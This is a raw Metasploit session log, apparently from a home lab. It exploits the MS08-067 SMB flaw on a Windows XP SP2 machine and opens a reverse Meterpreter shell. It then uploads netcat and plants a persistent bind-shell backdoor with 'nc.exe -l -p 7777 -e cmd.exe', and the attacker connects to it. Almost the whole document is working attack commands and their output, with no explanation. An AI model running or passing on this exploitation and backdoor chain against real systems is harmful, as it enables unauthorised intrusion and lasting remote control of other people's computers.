msf > use exploit/windows/smb/ms08_067_netapi
set PAYLOADS winodws/meterpreter/reverse_tcp
PAYLOADS => winodws/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.2
RHOST => 192.168.56.2
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.2 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.2:1038) at 2011-07-03 00:45:42 +0700
meterpreter > upload /root/Desktop/nc.exe c:\\
[*] uploading : /root/Desktop/nc.exe -> c:\
[*] uploaded : /root/Desktop/nc.exe -> c:\\nc.exe
meterpreter > shell
Process 576 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd ..
cd ..
C:\WINDOWS>cd ..
cd ..
C:\>cls
cls
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 78F1-F486
Directory of C:\
06/26/2011 12:49 AM 0 AUTOEXEC.BAT
06/26/2011 12:49 AM 0 CONFIG.SYS
06/26/2011 05:45 PM <DIR> Documents and Settings
07/03/2011 01:19 AM 59,392 nc.exe
06/26/2011 01:01 AM <DIR> Program Files
06/29/2011 03:31 AM <DIR> rain
06/29/2011 03:33 AM <DIR> uun
06/29/2011 12:49 AM <DIR> WINDOWS
3 File(s) 59,392 bytes
5 Dir(s) 3,695,656,960 bytes free
C:\>nc.exe
nc.exe
Cmd line:
no port[s] to connect to
C:\>nc.exe -l -p 7777 -e cmd.exe
nc.exe -l -p 7777 -e cmd.exe
[root@Novemberain][~]
[#] nc 192.168.56.2 7777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>
C:\>netstat -an
netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:23 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING
TCP 192.168.56.2:139 0.0.0.0:0 LISTENING
TCP 192.168.56.2:1034 192.168.56.1:4444 CLOSE_WAIT
TCP 192.168.56.2:7777 192.168.56.1:47816 ESTABLISHED